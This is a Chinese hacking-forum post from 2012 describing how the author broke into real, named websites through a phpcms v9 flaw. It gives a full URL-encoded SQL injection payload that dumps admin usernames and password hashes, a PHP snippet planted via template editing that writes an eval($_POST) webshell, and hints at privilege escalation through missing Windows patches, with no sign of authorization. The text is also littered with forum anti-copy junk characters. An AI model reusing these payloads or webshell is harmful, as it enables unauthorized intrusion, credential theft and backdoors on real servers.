中国网络渗透测试联盟

标题: 利用phpcms v9 0day拿shell [打印本页]
作者: admin    时间: 2012-12-20 08:44
标题: 利用phpcms v9 0day拿shell
期末快到了,各种作业啊。。学计算机的伤不起啊。。话说我们有门课很有意思,叫做黑客攻防,期末作业就是黑站,我笑了。。前几天在服务器上嗅探把服务器搞死了,管理员漏洞也补了,写这篇文章单凭记忆,图片较少,还请见谅。

Author:夜行人

From:F4ck Team

0 ?7 T5 }4 \) W  ]  [

目标站:http://www.ipucom.com/

旁注到一个站点:www.zhongyitong.com有phpcmsv9注射漏洞

百度一下找到该漏洞的利用方法。

直接在该网站注册用户名,然后在该网站域名后加上这段代码就能爆出数据库名

api.php?op=add_favorite&url=xx.oo&title=%2527
& T# f! e# N# N                                             8 A/ X! d& K- x5 @" A

7 m) B# y& f$ o. M0 M                                4 ?7 ]2 ^5 G9 f& n0 i
  s; C( I( S0 i9 `; @" a5 ]- G
                                                           [attach]127[/attach]: _3 N! T& \% W1 q( S* T! H

9 E0 M9 a7 E5 c: F" j& W1 n$ W# c
' x  `$ Z& }1 x8 K  W1 T, L7 q2 a$ [0 W1 J
! ?: B" a% @* R& _6 r: F
                                                          [attach]128[/attach]+ o5 R9 Z) @! O3 s! o! l4 y7 D
                                                          [attach]129[/attach]
$ i9 s8 W( n! G3 |# `

这里可以清楚的看到数据库名和表名,然后把该表名替换一下代码中的表名

api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%

2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select

%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252C

password%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from

%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables

%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from

%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and

%2520%25271%2527%253D%25271


( A3 Q+ h" b- x" o. a; k6 M2 ^

                                            [attach]130[/attach]
( D+ s' Y# b8 X& ^+ V  U
2 X% G# t3 Y! ?& X/ Z3 o1 [' a: {8 Y- r3 W, V) y8 e

- j+ `: G/ V4 z) z# [7 J4 k

帐号密码就出来了,md5解密一下就行了

进入后台, 界面 > 模板管理 > 模板风格 >
2 s1 A$ k' B, w4 w5 q4 J0 x" W + t. g( R. L$ R) \( B4 z! q1 d

: L% G* N% \, Q0 @' F5 T& ]                                                 [attach]131[/attach]" ~0 u, a  U' }& V9 w
. v0 [+ m, v! J( t$ D2 q
) T% \8 M! G8 r% \! l" Y* o9 p

. Y: [! [" s$ @' C# O" p# z- D3 G5 d# x( p

0 j" {" W- e6 V- y+ _% a

点击后面的修改,然后把一下代码复制上去保存

<?

$fp = @fopen("c.php", 'a');

@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[zmzsg100])'."\r\n\r\n?".">\r\n");

@fclose($fp);

?>
3 A: j& N* x9 u  f, z
0 \* v" Q; ~& E+ t& f% k
1 {# I" O# T) Q% F- u
/ u' r( z7 f) U; l( K
% x+ R2 t5 N* J5 h: S                                                                         [attach]132[/attach]
$ `& i4 B2 a8 ]. x  |% e+ `2 s, s/ h# ~# a* d* E, b7 Z

# Y6 R/ M; J3 |: h( A( P
; U; \; \7 ]0 {
2 Q  C: q$ z" n# N% w: ]% C4 j  h1 B3 Q  q

提交后可视化一下
* L3 A. b  O8 Z+ u! V* B8 t- i5 Z1 B; R3 K0 G* j1 }" k

在网站的根目录就生成了你的一句话木马客户端

http://www.zhongyitong.com/f4ck.php

然后通过控制端连上去就行了。。。

提权貌似很简单,看了下systeminfo

发现没有

KB2503665

KB2592799





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2